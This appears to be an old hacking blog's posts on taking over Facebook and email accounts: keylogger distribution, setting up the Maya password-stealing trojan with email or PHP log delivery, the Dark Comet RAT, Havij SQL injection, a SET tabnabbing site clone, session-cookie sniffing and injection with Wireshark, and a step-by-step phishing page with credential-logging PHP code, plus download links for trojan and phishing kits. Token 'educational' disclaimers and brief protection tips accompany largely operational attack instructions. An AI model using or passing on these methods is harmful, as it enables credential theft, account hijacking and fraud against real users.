d0837296baef4fc14d667832c1a5215944b54a8f46af2d5c5c TipsS And TricksS: Facebook Hacking
Showing posts with label Facebook Hacking. Show all posts
Showing posts with label Facebook Hacking. Show all posts
on Monday, 23 April 2012
Key logger are the software that monitors  keystrokes activities performed by the victim. It records every keyword that was typed by the user including E- mails, Password, Usernames, Bank accounts information.. etc. It sends log to the attacker E mail id. This can give your secret information to the attacker email. By this attacker has access to your accounts and email Ids.

Facebook Hacking
By key logger you can hack also Facebook accounts of the people. You send key logger through Some files
by attaching your key logger to that files. Once victim downloaded your files and execute his downloaded files
Key logger also get activated with that files and start working. It start's recording every keystroke which was typed by the victim and you get log of the every keystroke  to your E mail account. You get the username and password of the victim Facebook account. It is so easy.  

Protection
Anti-virus companies  added information about known key logger in their anti virus database. For new key logger one should update his antivirus everyday. Keep updating your antivirus every day. This may help you detect key logger and provide protection against key logger.

Install the firewall and this also help you to detect key logger and also prevent it.

Use virtual keyboard while entering Usernames & passwords or any important information about accounts (banks). As this technique prevent the key logger by sending  the important information to the attacker.
Steps to open virtual Keyboard  
Start > Programs > Accessories > Accessibility > On-Screen Keyboard
Some mostly used keylogger
 Refog
Revealer Keylogger
Super Free Keylogger
Actual Keylogger
Only  for education purpose... Try at your own risk
i hope this post is helpful to you..... :D

 

  
on Sunday, 22 April 2012

 

Hack Facebook account and E-mail id - Maya
Maya ( password Stealer ) by Prince Ali. It is used by the hackers to steal the password's from  victim system.
It is mostly used to hack the E-mail accounts you can use it for hack the Facebook accounts. It is easy to understand and use. You can make your own "trojan" ( virus ) just in three simple steps.
It create log in three methods
  • Mail Delivery
  • PHP Delivery
  • Save Locally
How to setup Maya 
  • Mail Delivery
If you are setting your maya with " Mail Delivery". You are able to send your maya log through the Email accounts. In Recipient Email put your email id and in From Email you put the victim Email id ( which you want to hack ). Then put your File Name ( maya.exe ) and select the option below i.e (Ras Passwords , Grab IE Urls and ActiveX Startup).
Note- Maya will check for 2 hours if it get the new password then it will send thos to your Email.
  • PHP Delivery
First you upload your PHP script into your site like " ww,yoursite.com ". Put your uploaded php url to the PHP Script Url.
*Before uploading
Remember Changing the php Script password and Entry number , Open the File with
Notepad.
The First 3 Entries are :
$view_pass = “password”; //This is the Password you will use to view the Logs
$length = 1000; //The number of Entries to keep
$ctrl_file = “mpws.txt”; // the Text file name the passes will be saved in it 
Remember to CHMOD the Files , on Some Host the ctrl_file cannot be automatically create so it is recommended to create a blank file and upload it urself .

You can see the password here
http://www.yoursite.com/logger.php?pass=mypassword
You can set password to your logs so that no other person can see that
http://www.yoursite.com/logger.php?action=clear&pass=mypassword
  • Save Locally
By selecting the save locally option  and your  password will save on C:/maya.html
Some important terms
RAS passwords :- If you want to clear the Internet connection passes.
Grab IE urls :- To grab the IE urls.
ActiveX start UP :- It will start as the windows starts.

Download Maya
click here
password :- NWC

 
Only  for education purpose... Try at your own risk
 i hope this post is helpful to you...... :d
 


on Saturday, 21 April 2012



Rats ( Remote Access Tool) is type of computer virus that allows to control your system remote and  the operator control your system fully. Rats installed in a system with out victim  knowledge and it disable your all security of your system ( antivirus, firewall settings...etc).

An operator share your personal data and steal your personal information  like credit cards details, email id, passwords... etc.
It is basically used to hack the bank accounts of the victim's. An operator can send Rats to the victim and steals his all bank account information including usernames and passwords.

It is send through media files, software available in the internet when a victim download any software containing rat he is unaware of rats. When he execute that software the rats also get's activated along with the software and start it effect by disabling various security software available in the system (antivirus , firewall settings ...etc), Through Email ID, also by clicking in unwanted hyperliks.

 Important rat used by hackers
Dark Comet

To protect your system  from rats install  Dark Comet Remover
Only for education purpose... Try it at your own Risk
i hope this post is helpful to you >> :D
 
on Friday, 20 April 2012
Hey friends today i am going to tell you about sql injection . I m not going to discuss about sql injection here.
I will just tell you how to don it
let's start
First you need a vul site ( you can find this by using the sql dorks)
Here i am discussing about hacking a sql vul site with a tool ( havij ). So, I m not to going to tell anything about manual sql injection..
If you have  a tool ( havij ) just copy the vuk site and paste it in a target . If you have a tool you can see this the target bar.
Rest you come to know from the video
video link

Only for education purpose... Try it at your own Risk 
i hope you like it.... :D  

on Thursday, 19 April 2012
Hey friends , Today i m going to tell you how to hack Facebook account (phishing) with uploaded site...
It is the most common method used to hack Facebook account. It is easy than making a virus or key logger .
You just have to upload files on some hosting files or if you hacked any site and having a shell on it you can
upload your phishing files there and give your links to the victim to hack their accounts. You also need your brain also to flatter them. best of luck 

Watch video tut made by me
http://www.youtube.com/watch?v=AobncZiEW0Q



Download  facebook phishing files
click here 
Pass- nyrohacker 
Only for education purpose... Try it at your own Risk 

i hope u all like it...
on Wednesday, 4 April 2012
Hello, friends i am back with a latest post on hacking facebook,gmail accounts using backtrack and social engineering kit.Things you needed are following:--->
1. Backtrack 5 R2
2. Internet connection
3. A brain
Now follow all my steps like i am showing in this post:----->

1. First open the social engineering kit using this command in cd /pentest/exploits/set and then press enter and then type ./set and hit enter like in image.

2. Now type 1 to select Social-Engineering Attacks and hit enter as in image.

3. Now type 2 to select Website Attack Vectors and hit enter as in image.

4. Now type 4 to select Tabnabbing Attack Method and hit enter.

5. Now type 2 to select Site Cloner and hit enter.

6. Now enter the site address whom which you want to create fake pages.

7. Now ti will start cloning the site.
8. Now send ur ip address as a link to victim.

9. Now when victim click on it he/she get the fake page and when he fill the details he will got hacked.
Note : its for educational purpose.
on Sunday, 25 December 2011
The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

Step 1 - First of all download wireshark from the official website and install it.

Step 2 - Next open up wireshark click on analyze and then click on interfaces.

Step 3 - Next choose the appropriate interface and click on start.



Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 - Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.
Step 7 -  Next right click on it and goto Copy - Bytes - Printable Text only.
Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and thecookieinjector script. Now open up Facebook.com and make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.


Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.

Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.


Countermeasures

The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won't be able to do any thing with your cookies. 
on Saturday, 17 December 2011

Today I will tell you about the famous hacking technique called “Phishing“. In this technique hackers just make a fake page of any website to hack user account , then if user entre his/her account name and password hacker get the account details and hack the account of user.
Before starting i just want to tell you the this information is for only knowlegde not for the practical use.
I will tell you how to create phishing pages for facebook. To view demo visit View demo
Steps to create a phishing page of facebook:======
1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.
2. Select all ( CTR + A ) and copy all the code and paste it in notepad.
3. Then search(CTR + F) for the keyword action.You can see the code as given below.
action=”https://www.facebook.com/login.php?login_attempt=1″
4. Just change the above code as mentioned below
action=”pass.php”
after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php$fp = fopen("Passwords.htm", "a");fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");echo "“;?>


Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘
6. By this step our PHP script is also ready,
7. Now host these 2 files ie,
facebook.html
pass.php
in any of free hosting servers like ripway,drivehq,110 mb or t35.com etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.
8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.
9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.